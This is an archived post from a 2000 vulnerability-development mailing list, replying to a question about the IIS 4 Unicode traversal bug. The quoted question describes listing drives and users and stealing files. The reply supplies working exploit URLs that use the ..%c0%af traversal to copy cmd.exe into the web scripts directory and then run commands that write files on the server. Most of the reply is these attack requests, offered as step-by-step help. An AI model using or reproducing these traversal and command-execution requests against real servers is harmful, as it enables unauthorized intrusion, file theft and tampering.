Vulnerability Development mailing list archives
Re: dos commands via iis 4
From: "[ K o S a K ]" <kosak () EPSYLON ORG>
Date: Fri, 10 Nov 2000 02:21:23 +0100
To create a file : First copy \winnt\system32\cmd.exe in /inetpub/scripts/ http://www.site.com/scripts/..%c0%af/winnt/system32/cmd.exe?/c+copy+..\..\wi nnt\system32\cmd.exe+cmd2.exe Then Run : http://www.site.com/scripts/..%c0%af../inetpub/scripts/cmd1.exe?/c+echo+hack +>file.txt now dir, your file is created. [ KoSaK ] ----- Original Message ----- From: "booboo" <booboo () 65535 COM> To: <VULN-DEV () SECURITYFOCUS COM> Sent: Thursday, November 09, 2000 12:21 PM Subject: dos commands via iis 4
Dear Guys, I have been playing around with the latest iis unicode bug using the ..%c0%af.. strings and have had some success. I have been able to get directory listings of all the drives, lists of users and shares and steal files etc.. However, I have not been able to create files. I have been trying to use 'type'with re-directs but it does not seem to like the re-direct symbols. I have tried in quotation marks and using hex but no luck. Does anyone know how to do it.. or has an alternative.. This is just for testing. Any help appreciated. BooBoo
Current thread:
- dos commands via iis 4 booboo (Nov 10)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Nikolaou, Dinos (Nov 11)
- Re: dos commands via iis 4 Bluefish (P.Magnusson) (Nov 23)
- Re: dos commands via iis 4 RayW, CISSP (Nov 11)
- Re: dos commands via iis 4 Robert A. Seace (Nov 11)
- Re: dos commands via iis 4 booboo (Nov 15)
- <Possible follow-ups>
- Re: dos commands via iis 4 Unicraft Systems (Nov 11)
- Re: dos commands via iis 4 [ K o S a K ] (Nov 10)